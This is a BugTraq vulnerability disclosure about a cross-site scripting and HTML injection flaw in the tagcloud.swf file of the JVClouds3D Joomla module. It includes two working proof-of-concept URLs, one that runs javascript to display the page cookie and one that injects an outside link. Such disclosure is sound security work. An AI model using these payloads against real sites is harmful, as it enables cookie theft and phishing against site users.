BugTraq
Cross-Site Scripting vulnerability in JVClouds3D for Joomla Jan 08 2010 11:35PM
MustLive (mustlive websecurity com ua)
Hello Bugtraq!

I want to warn you about Cross-Site Scripting vulnerability in JVClouds3D
(mod_jvclouds3D) plugin for Joomla. Which I found at 08.01.2010.

It is similar to XSS vulnerability in Joomulus for Joomla
(http://websecurity.com.ua/3801/). About millions of flash files
tagcloud.swf which are vulnerable to XSS attacks I mentioned in my article
XSS vulnerabilities in 8 millions flash files
(http://websecurity.com.ua/3789/).

XSS:

http://site/modules/mod_jvclouds3D/jvclouds3D/tagcloud.swf?mode=tags&tag
cloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='fon
t-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS.

Also it's possible to conduct (like in WP-Cumulus and Joomulus) HTML
Injection attack, including in those flash files which have protection (in
flash files or via WAF) against javascript and vbscript URI in parameter
tagcloud.

HTML Injection:

http://site/modules/mod_jvclouds3D/jvclouds3D/tagcloud.swf?mode=tags&tag
cloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+
40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Vulnerable are JVClouds3D 1.0.9b and previous versions.

I mentioned about this vulnerability at my site
(http://websecurity.com.ua/3839/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus